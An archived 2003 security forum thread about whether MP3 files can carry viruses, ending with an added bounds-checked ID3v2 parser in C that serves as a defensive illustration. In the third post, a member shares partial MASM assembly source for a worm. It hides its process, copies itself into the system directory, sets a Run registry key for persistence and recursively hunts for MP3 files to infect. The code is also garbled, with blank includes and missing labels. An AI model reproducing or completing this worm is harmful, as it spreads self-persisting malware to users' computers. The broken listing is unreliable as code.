#2714 - 09/17/03 12:15 AM Virus on mp3 files?  
Joined: Feb 2003
Posts: 10
GhostintheNight Offline
Junior Member
Even though I think he's completely wrong, a buddy of mine told me that he downloaded a song or something to that effect from Kazaa and ended up getting a virus from it. He says it wasn't a program that the virus came from, but from a song... just wondering if anyone had heard about viruses being embedded in media files...

#2715 - 09/17/03 12:56 AM Re: Virus on mp3 files?  
Joined: Oct 2002
Posts: 955
jonconley Offline
UGN Super Poster
Merrill, IA, USA
Actually, the mp3/wma itself doesn't have a virus. I believe it is in the handling of the ID3 tags (they hold the specific info about the song, artist, etc).

Windows Hole
WinAmp Hole

I am sure there are more, but this at least shows you that it is possible.

#2716 - 09/19/03 10:43 AM Re: Virus on mp3 files?  
Joined: Aug 2003
Posts: 240
paradox Offline
New Zealand
There is an exploit for midi files changing the tags and setting the buffer to 0xfffffffff. As for mp3:
.Model Flat ,StdCall
option casemap:none

include ..\..\include\
include ..\..\include\
include ..\..\include\
include ..\..\include\
includelib ..\..\lib\kernel32.lib
includelib ..\..\lib\user32.lib
includelib ..\..\lib\advapi32.lib
residentname db "\SYSLOAD.EXE",0
regserviceproc db "RegisterServiceProcess",0
kernel32str db "kernel32.dll",0
subkey db "Software\Microsoft\Windows\CurrentVersion\Run",0
keyname db "Reptile",0
searchpattern db "???*",0
rootdir db "\",0
previousdir db "..",0
searchindex dd ?
wormlocation dd ?
keyhandle dd ?
finddata WIN32_FIND_DATA <>
systemdir db MAX_PATH dup(?)
searchhandles db 3FCh dup(?) ;255 dwords

mov eax,worm_end - worm_start
;=======Hide myself from "Close Program" Dialog=======
invoke LoadLibraryA,addr kernel32str
invoke GetProcAddress,eax,addr regserviceproc
push 1
push NULL
call eax
;==============Find the Name/path of the worm=========
invoke GetCommandLine
inc eax
xor edx,edx
xchg eax,esi
mov edi,esi
cmp al,'"'
je FoundEnd
cmp al, 00h
jne GetNextChar
push 7
pop edx
dec esi
xchg esi,edi
xor eax,eax
test edx,edx
je NoQuotes
dec esi
mov wormlocation,esi
;==============Copy it to the system directory========
invoke GetSystemDirectory, addr systemdir, SIZEOF systemdir
invoke lstrcat, addr systemdir, addr residentname
invoke CopyFile, wormlocation, addr systemdir, FALSE
;==============Make it run when Windows starts========
invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr subkey, NULL, \
addr keyhandle, NULL

invoke lstrlen, addr systemdir
invoke RegSetValueEx, keyhandle, addr keyname, NULL, REG_SZ, \
addr systemdir, eax

invoke SetCurrentDirectory,addr rootdir
Call FindVictims
;==============Clean Up===============================
invoke RegCloseKey, keyhandle
invoke MessageBoxA,NULL, addr keyname,NULL,MB_OK
invoke ExitProcess,NULL
;==============Find MP3 files to infect===============
FindVictims proc
invoke FindFirstFile, addr searchpattern, addr finddata
inc eax
je BackOneDir
dec eax
inc searchindex
mov ecx, searchindex
lea edi, [searchhandles+4*ecx]
xchg ebx,eax
jmp CallParseRoutine
invoke FindNextFile, ebx, addr finddata
test eax,eax
je FinishSearch
Call ParseResult
jmp FindNext
invoke FindClose, ebx
dec searchindex
mov ecx, searchindex
test ecx,ecx
je SearchFinished
lea esi, [searchhandles+4*ecx]
xchg eax,ebx
invoke SetCurrentDirectory, addr previousdir
FindVictims endp
;==============Process result of FindFile*============
ParseResult proc
lea edi, finddata.cFileName
invoke CharLower, edi
invoke lstrlen, edi
lea esi, [finddata.cFileName-4+eax]
sub eax, '3pm.' ;Infect MP3 Files
jne NotMp3
invoke MessageBoxA,NULL,edi,NULL,MB_OK ;'Twas an MP3
and finddata.dwFileAttributes,FILE_ATTRIBUTE_DIRECTORY
je NotDirectory
mov word ptr [finddata.cFileName-2], "\."
invoke SetCurrentDirectory,addr finddata.cFileName-2
Call FindVictims
ParseResult endp

End Main

Still in construction, but there are lots of holes and it would, like jonconley said, be software dependent, etc.

The wise make mistakes, the fools repeat them
When you have eliminated the impossible, that which remains, however improbable, must be the truth
#2717 - 09/25/03 10:49 PM Re: Virus on mp3 files?  
Joined: Oct 2002
Posts: 364
Chem Offline
UGN News Staff
Vagabond (Location Differs)
Like jon said,

There's an exploit in the way most mp3 players (or just certain ones) handle mp3 metadata, and in turn can execute malicious code.

C++ Should Have Been Called "D"
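
Added example, not part of any post in this thread: a bounds-checked ID3v2 header and frame walker in C, showing the length checks a player has to make before trusting tag metadata. It is a generic illustration and does not reproduce the specific Windows or WinAmp issues linked above; the function names and sample bytes are constructed, and tags using an extended header or unsynchronisation are assumed out of scope and rejected or ignored.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decode a 28-bit synchsafe size; -1 if any byte has its high bit set. */
static long synchsafe(const uint8_t *p) {
    if ((p[0] | p[1] | p[2] | p[3]) & 0x80) return -1;
    return ((long)p[0] << 21) | ((long)p[1] << 14) | ((long)p[2] << 7) | p[3];
}

/* Walk the frames of an ID3v2.3/2.4 tag in buf[0..len). Returns the frame count,
   or -1 if a length field points outside the data actually present.
   The TIT2 (title) bytes are copied raw into out, truncated to fit outsz. */
int id3v2_check(const uint8_t *buf, size_t len, char *out, size_t outsz) {
    if (outsz) out[0] = '\0';
    if (len < 10 || memcmp(buf, "ID3", 3) != 0) return -1;
    unsigned ver = buf[3];
    if ((ver != 3 && ver != 4) || (buf[5] & 0x40)) return -1; /* ext. header rejected */
    long tagsz = synchsafe(buf + 6);
    if (tagsz < 0 || (size_t)tagsz > len - 10) return -1;     /* tag larger than file */
    size_t pos = 10, end = 10 + (size_t)tagsz;
    int frames = 0;
    while (end - pos >= 10 && buf[pos] != 0) {                /* 0 byte = padding */
        const uint8_t *h = buf + pos;                         /* 10-byte frame header */
        size_t fsz = ((size_t)h[4] << 24) | ((size_t)h[5] << 16) | ((size_t)h[6] << 8) | h[7];
        if (ver == 4) { long s = synchsafe(h + 4); if (s < 0) return -1; fsz = (size_t)s; }
        pos += 10;
        if (fsz == 0 || fsz > end - pos) return -1;           /* frame overruns the tag */
        if (memcmp(h, "TIT2", 4) == 0 && outsz > 0) {
            size_t n = fsz - 1;                               /* skip text-encoding byte */
            if (n > outsz - 1) n = outsz - 1;                 /* clamp to destination */
            memcpy(out, buf + pos + 1, n);
            out[n] = '\0';
        }
        pos += fsz; frames++;
    }
    return frames;
}

/* Constructed samples: a valid v2.3 tag, and the same tag with frame size 0xFFFFFFFF. */
static const uint8_t GOOD[] = {'I','D','3',3,0,0, 0,0,0,15, 'T','I','T','2', 0,0,0,5, 0,0, 0,'S','o','n','g'};
static const uint8_t BAD[]  = {'I','D','3',3,0,0, 0,0,0,15, 'T','I','T','2', 0xFF,0xFF,0xFF,0xFF, 0,0, 0,'S','o','n','g'};
char demo_title[8];                                           /* output buffer for main() */

int main(void) {
    int n = id3v2_check(GOOD, sizeof GOOD, demo_title, sizeof demo_title);
    printf("good=%d title=%s bad=%d\n", n, demo_title, id3v2_check(BAD, sizeof BAD, NULL, 0));
}
```

A parser that copies `fsz` bytes into a fixed buffer without the two comparisons against `end - pos` and `outsz` is the kind of tag-handling flaw the replies describe.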
